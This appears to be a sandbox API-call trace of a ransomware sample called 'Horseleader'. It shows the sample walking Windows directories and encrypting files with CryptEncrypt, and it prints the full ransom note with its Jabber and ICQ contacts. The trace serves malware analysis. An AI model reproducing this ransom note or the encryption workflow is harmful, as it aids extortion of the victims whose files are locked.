FindNextFileW (in: hFindFile=0x7c6860, 
lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb313d55, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb313d55, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x16e00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 1 [0250.998] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="Windows") returned -1 [0250.998] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned 63 [0250.998] StrStrIW (lpFirst="wab32res.dll.mui", lpSrch=".horseleader") returned 0x0 [0250.998] lstrcmpW (lpString1="wab32res.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0250.998] lstrcmpW (lpString1="wab32res.dll.mui", lpString2="_uninstalling_.png") returned 1 [0250.998] lstrlenW (lpString=".testttjffg") returned 11 [0250.998] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui", lpSrch=".testttjffg") returned 0x0 [0250.998] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.998] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.999] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb313d55, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb313d55, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x16e00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 0 [0250.999] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.999] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\#Decrypt#.txt") returned 60 [0250.999] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0251.000] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.000] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0251.001] lstrlenA (lpString="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") returned 1368 [0251.001] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0251.001] CloseHandle (hObject=0x21c) returned 1 [0251.001] GetProcessHeap () returned 0x780000 [0251.003] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0251.003] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="msadc", cAlternateFileName="")) returned 1 [0251.003] lstrcmpiW (lpString1="msadc", lpString2="Windows") returned -1 [0251.003] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc") returned 46 [0251.003] lstrcmpW (lpString1="msadc", lpString2=".") returned 1 [0251.003] lstrcmpW (lpString1="msadc", lpString2="..") returned 1 [0251.004] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.004] GetProcessHeap () returned 0x780000 [0251.004] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 
[0251.004] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*") returned 48 [0251.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0251.011] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.011] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\.") returned 48 [0251.011] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.011] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0251.011] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.011] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\..") returned 49 [0251.011] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.012] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.012] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c44b4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa34c44b4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa05a2bb2, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x276, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="adcjavas.inc", cAlternateFileName="")) returned 1 [0251.012] lstrcmpiW (lpString1="adcjavas.inc", lpString2="Windows") returned -1 [0251.012] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 59 [0251.012] StrStrIW (lpFirst="adcjavas.inc", lpSrch=".horseleader") returned 0x0 [0251.012] lstrcmpW (lpString1="adcjavas.inc", lpString2="#Decrypt#.txt") returned 1 [0251.012] lstrcmpW (lpString1="adcjavas.inc", lpString2="_uninstalling_.png") returned 1 [0251.012] lstrlenW (lpString=".testttjffg") returned 11 [0251.012] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc", lpSrch=".testttjffg") returned 0x0 [0251.012] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.013] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.013] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.014] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34ea611, 
ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa34ea611, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa063b126, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x26f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="adcvbs.inc", cAlternateFileName="")) returned 1 [0251.014] lstrcmpiW (lpString1="adcvbs.inc", lpString2="Windows") returned -1 [0251.014] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 57 [0251.014] StrStrIW (lpFirst="adcvbs.inc", lpSrch=".horseleader") returned 0x0 [0251.014] lstrcmpW (lpString1="adcvbs.inc", lpString2="#Decrypt#.txt") returned 1 [0251.014] lstrcmpW (lpString1="adcvbs.inc", lpString2="_uninstalling_.png") returned 1 [0251.015] lstrlenW (lpString=".testttjffg") returned 11 [0251.015] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc", lpSrch=".testttjffg") returned 0x0 [0251.015] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.015] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.015] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.015] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, 
ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0251.015] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0251.015] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned 52 [0251.015] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0251.015] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0251.015] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.015] GetProcessHeap () returned 0x780000 [0251.016] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.016] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*") returned 54 [0251.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.052] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.052] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.") returned 54 [0251.052] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.052] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="..", cAlternateFileName="")) returned 1 [0251.053] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.053] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\..") returned 55 [0251.053] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.053] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.053] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9351968, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x9351968, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msadcer.dll.mui", cAlternateFileName="")) returned 1 [0251.053] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="Windows") returned -1 [0251.053] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui") returned 68 [0251.053] StrStrIW (lpFirst="msadcer.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.053] lstrcmpW (lpString1="msadcer.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.053] lstrcmpW (lpString1="msadcer.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.053] lstrlenW (lpString=".testttjffg") returned 11 
[0251.053] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.053] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.053] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.053] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.054] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc32e361, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xc60371c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xc32e361, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msadcfr.dll.mui", cAlternateFileName="")) returned 1 [0251.054] lstrcmpiW (lpString1="msadcfr.dll.mui", lpString2="Windows") returned -1 [0251.054] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui") returned 68 [0251.054] StrStrIW (lpFirst="msadcfr.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.055] lstrcmpW (lpString1="msadcfr.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.055] lstrcmpW (lpString1="msadcfr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.055] lstrlenW (lpString=".testttjffg") returned 11 [0251.055] StrStrW (lpFirst="\\\\?\\C:\\Program 
Files\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.055] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.055] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.055] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcfr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.055] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a073ed, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x9e34029, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x9a073ed, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msadcor.dll.mui", cAlternateFileName="")) returned 1 [0251.055] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="Windows") returned -1 [0251.055] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui") returned 68 [0251.055] StrStrIW (lpFirst="msadcor.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.055] lstrcmpW (lpString1="msadcor.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.056] lstrcmpW (lpString1="msadcor.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.056] lstrlenW (lpString=".testttjffg") returned 11 [0251.056] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\System\\msadc\\en-US\\msadcor.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.056] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.056] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.056] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.056] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93053f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x93053f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msaddsr.dll.mui", cAlternateFileName="")) returned 1 [0251.056] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="Windows") returned -1 [0251.056] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui") returned 68 [0251.056] StrStrIW (lpFirst="msaddsr.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.056] lstrcmpW (lpString1="msaddsr.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.056] lstrcmpW (lpString1="msaddsr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.056] lstrlenW (lpString=".testttjffg") returned 11 [0251.056] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui", 
lpSrch=".testttjffg") returned 0x0 [0251.057] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.057] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.057] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.058] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb313d55, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb313d55, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msdaprsr.dll.mui", cAlternateFileName="")) returned 1 [0251.058] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="Windows") returned -1 [0251.058] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui") returned 69 [0251.058] StrStrIW (lpFirst="msdaprsr.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.058] lstrcmpW (lpString1="msdaprsr.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.058] lstrcmpW (lpString1="msdaprsr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.058] lstrlenW (lpString=".testttjffg") returned 11 [0251.058] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui", lpSrch=".testttjffg") returned 0x0 
[0251.058] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.058] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.058] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b8e84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x92b8e84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msdaremr.dll.mui", cAlternateFileName="")) returned 1 [0251.058] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="Windows") returned -1 [0251.058] wnsprintfW (in: 